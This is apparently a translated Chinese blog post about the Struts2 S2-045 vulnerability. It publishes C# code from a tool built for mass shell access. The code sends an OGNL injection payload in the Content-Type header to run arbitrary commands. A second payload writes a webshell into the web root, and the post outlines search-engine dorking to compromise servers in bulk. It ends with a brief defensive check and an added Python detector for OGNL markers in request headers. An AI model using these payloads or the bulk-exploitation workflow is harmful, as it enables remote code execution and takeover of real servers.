Struts2 S2-045 Vulnerability
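The S2-045 vulnerability broke out a few days ago, but many sites are still affected by it, and many financial sites have also received "protection fee" notices... Sigh, the protection fees demanded are small and reporting to the police does nothing! It can only be dealt with as the situation allows! To those working in the black market: better to do less of it. Stand by the river often enough and your shoes will get wet. I urge you all to wash your hands of it soon!
As for how the vulnerability works, I won't go into it! Why??? Because I haven't studied it and I don't understand it!!!
A studio asked me to write a tool for getting shells in bulk; I am only releasing part of the code. It is written in C#.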
public static string ExecuteStruts2(string url,string cookie,string cmd)
{
    ServicePointManager.SecurityProtocol = SecurityProtocolType.Ssl3;
    HttpWebRequest request = null;
    try
    {
        request = (HttpWebRequest)WebRequest.Create(url);
        request.Method = "GET";
        request.AllowAutoRedirect = false;
        if (!string.IsNullOrEmpty(cookie))
        {
            request.Headers.Add("Cookie",cookie);
        }
        request.ContentType = "%{(#nike=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘"+cmd+"‘).(#iswin=(@[email protected](‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}";
        request.UserAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/56.0.2924.87 Safari/537.36";
        request.Timeout = 50000;
        request.ServicePoint.ConnectionLimit = 500;
        HttpWebResponse response = (HttpWebResponse)request.GetResponse();
        string result = "";
        string encoding = "gb2312";
        if (!string.IsNullOrEmpty(response.CharacterSet))
        {
            encoding = response.CharacterSet;
        }
        Stream myResponseStream = response.GetResponseStream();
        StreamReader myStreamReader = new StreamReader(myResponseStream, Encoding.GetEncoding(encoding));
        result = myStreamReader.ReadToEnd();
        myStreamReader.Close();
        myResponseStream.Close();
        response.Close();
        request.Abort();
        return result;
    }
    catch(Exception ex)
    {
        request.Abort();
        return "执行错误:"+ex.Message;
    }
}
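This one executes commands, for example creating a user or escalating privileges, after which you can connect remotely or upload a trojan.
A webshell can also be uploaded; just change the ContentType to: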
%{(#container=#context[‘com.opensymphony.xwork2.ActionContext.container‘]).(#luan=‘multipart/form-data‘).(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#path=#context.get(‘com.opensymphony.xwork2.dispatcher.HttpServletRequest‘).getSession().getServletContext().getRealPath(‘"+path+ "‘)).(#shell=‘我是shell‘).(new java.io.BufferedWriter(new java.io.FileWriter(#path+‘/shell文件名‘).append(#shell)).close()).(#cmd=‘echo path:‘+#path).(#iswin=(@[email protected](‘os.name‘).toLowerCase().contains(‘win‘))).(#cmds=(#iswin?{‘cmd.exe‘,‘/c‘,#cmd}:{‘/bin/bash‘,‘-c‘,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}
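There are other ways to play with it that you can work out by modifying it yourself. After that it is just inurl:****.action: crawl the search engines, collect URLs, check them in bulk, and upload shells in bulk.
Anyone running struts2 should hurry up and check whether any new jsp, jspx or similar files have been created in the last few days. As for fixing it, there are plenty of methods online, as well as third-party tools and so on.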
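Both payloads above travel in the Content-Type header, so a defender can flag request header values that are not well-formed media types or that carry OGNL markers. The Python below is an added example, not code from the original post; the function names, the marker list (taken from the payloads quoted above) and the sample requests are constructed for illustration.

```python
import re

# RFC 7231 media-type grammar: token "/" token *( ";" parameter )
_TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"
_PARAM = rf'{_TOKEN}=(?:{_TOKEN}|"(?:[^"\\]|\\.)*")'
_MEDIA_TYPE = re.compile(rf"^{_TOKEN}/{_TOKEN}(?:\s*;\s*{_PARAM})*\s*$")

# Markers taken from the payloads quoted in the post (compared lowercased).
OGNL_MARKERS = ("%{", "#_memberaccess", "#context", "#container",
                "java.lang.processbuilder")


def classify_content_type(value):
    """Return the reasons a Content-Type value is suspicious ([] = clean)."""
    lowered = value.lower()
    reasons = []
    hits = [m for m in OGNL_MARKERS if m in lowered]
    if hits:
        reasons.append("ognl-marker:" + ",".join(hits))
    if not _MEDIA_TYPE.match(value.strip()):
        reasons.append("malformed-media-type")
        # The post's payloads carry this literal inside the expression.
        if "multipart/form-data" in lowered:
            reasons.append("multipart-literal-in-malformed-value")
    return reasons


def scan(records):
    """records: iterable of (client, path, content_type); return flagged ones."""
    flagged = []
    for client, path, content_type in records:
        if not content_type:  # requests without a body often send no header
            continue
        reasons = classify_content_type(content_type)
        if reasons:
            flagged.append((client, path, reasons))
    return flagged


# Constructed sample requests; the expression is truncated and non-functional.
SAMPLE = [
    ("192.0.2.10", "/login.action", "application/x-www-form-urlencoded"),
    ("192.0.2.11", "/upload.action",
     "multipart/form-data; boundary=----WebKitFormBoundaryabc123"),
    ("198.51.100.7", "/index.action",
     "%{(#x='multipart/form-data').(#_memberAccess=...)}"),
    ("198.51.100.8", "/upload.action", "multipart/form-data boundary=x"),
]

if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE):
        print(client, path, "; ".join(reasons))
```

Default access-log formats usually omit Content-Type, so the header has to be added to the log format or captured at a reverse proxy before a check like this has anything to read.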